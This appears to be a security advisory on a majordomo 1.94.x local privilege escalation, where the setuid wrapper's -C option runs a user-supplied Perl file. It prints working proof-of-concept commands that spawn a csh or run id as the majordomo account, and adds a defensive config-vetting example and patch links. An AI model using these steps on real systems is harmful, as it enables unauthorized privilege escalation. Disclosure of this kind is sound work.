COMMAND

    majordomo

SYSTEMS AFFECTED

    majordomo 1.94.4 (others?)

PROBLEM

    Shevek found the following.  It is a way to get majordomo
    privileges as a user:

        shevek@tirin ~$ cat foo.pl
        system("/bin/csh");
        shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
        %
        %whoami
        majordom

        root@tirin /usr/local/majordomo# ls -ld .
        drwxr-x--x   6 majordom daemon       1024 Dec  2 21:49 ./
        root@tirin /usr/local/majordomo# ls -l wrapper
        -rwsr-xr-x   1 root     daemon       6630 Jul 12 11:21 wrapper*

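    The relevant lines in majordomo (the bug was found by simple
    inspection; it is also in resend).  The argument to -C is stored
    in $cf and, after only a readability test, passed to require,
    which runs the file as Perl code: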

    $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

    while ($ARGV[0]) {      # parse for config file or default list
        if ($ARGV[0] =~ /^-C$/i) {  # sendmail v8 clobbers case
            $cf = $ARGV[1];
            shift(@ARGV);
            shift(@ARGV);
        } elsif ($ARGV[0] eq "-l") {
            $deflist = $ARGV[1];
            shift(@ARGV);
            shift(@ARGV);
        } else {
            die "Unknown argument $ARGV[0]\n";
        }
    }
    if (! -r $cf) {
        die("$cf not readable; stopped");
    }

    require "$cf";

    This was tested with majordomo version 1.94.4 and Perl 5.005_03.
    Whereas majordomo 1.94.5 does fix the bug in resend, discovered
    by Brock Tellier, that permits execution of arbitrary code as
    user majordomo, it apparently does not fix the other bug in the
    script majordomo, that permits execution of arbitrary config
    files as user majordomo.  On a fresh install of majordomo 1.94.5
    in /tmp:

        [brock@o2 /tmp]$ id
        uid=1116(brock) gid=1116(brock)
        [brock@o2 /tmp]$ ls -l ./id.pl
        -rwxr-xr-x    1 brock    brock         31 Jan 24 14:17 ./id.pl
        [brock@o2 /tmp]$ cat id.pl
        #!/usr/bin/perl

        system("id");
        [brock@o2 /tmp]$ ./majordomo-1.94.5/wrapper majordomo -C ./id.pl
        uid=1126(majordomo) gid=1(daemon)
        ./id.pl did not return a true value at /tmp/majordomo-1.94.5/majordomo line 47.
        [brock@o2 /tmp]$
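
    The check missing before the require "$cf" shown above, as an
    added example (not Majordomo's code and not the vendor's fix).
    The vet_config helper, its $trusted_dir parameter and the demo
    file names are hypothetical.

```perl
#!/usr/bin/perl
# Added example, not Majordomo's code: vet a -C argument before `require`.
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Basename qw(dirname);
use File::Temp qw(tempdir);

# Return the canonical path if $cf is safe to load, otherwise die.
# $trusted_dir (hypothetical parameter) is the only directory configs may live in.
sub vet_config {
    my ($cf, $trusted_dir) = @_;
    my $real = abs_path($cf);    # resolves symlinks and ".." components
    die "config path does not resolve to a file\n"
        unless defined $real && -f $real;
    my $dir = abs_path($trusted_dir);
    die "trusted directory missing\n" unless defined $dir;
    die "config is outside $dir\n" unless dirname($real) eq $dir;
    my @st = stat($real) or die "cannot stat config\n";
    my ($mode, $uid) = @st[2, 4];
    # Owner must be root or the account the script runs as.
    die "config is owned by uid $uid\n" unless $uid == 0 || $uid == $>;
    die "config is group- or world-writable\n" if $mode & 0022;
    return $real;
}

# Constructed demo files: one good config, one loose one, one outside file.
my $trusted = tempdir(CLEANUP => 1);
my $outside = tempdir(CLEANUP => 1);
for my $f ("$trusted/majordomo.cf", "$trusted/loose.cf", "$outside/foo.pl") {
    open(my $fh, '>', $f) or die "open $f: $!\n";
    print $fh "1;\n";
    close($fh);
    chmod 0644, $f;
}
chmod 0666, "$trusted/loose.cf";
symlink("$outside/foo.pl", "$trusted/link.cf");    # symlink out of the directory

for my $cf ("$trusted/majordomo.cf", "$trusted/loose.cf",
            "$trusted/link.cf", "$outside/foo.pl") {
    my $ok  = eval { vet_config($cf, $trusted) };
    my $msg = $ok ? "load   $cf\n" : "reject $cf: $@";
    print $msg;
}
```

    Only the first demo file is accepted.  The check is only as
    strong as the trusted directory, which must itself not be
    writable by ordinary users.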

SOLUTION

    For Red Hat Powertools 6.1:

        intel: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/i386/majordomo-1.94.5-2.i386.rpm
        alpha: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/alpha/majordomo-1.94.5-2.alpha.rpm
        sparc: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/sparc/majordomo-1.94.5-2.sparc.rpm
        sources: ftp://ftp.redhat.com/redhat/updates/powertools/6.1/SRPMS/majordomo-1.94.5-2.src.rpm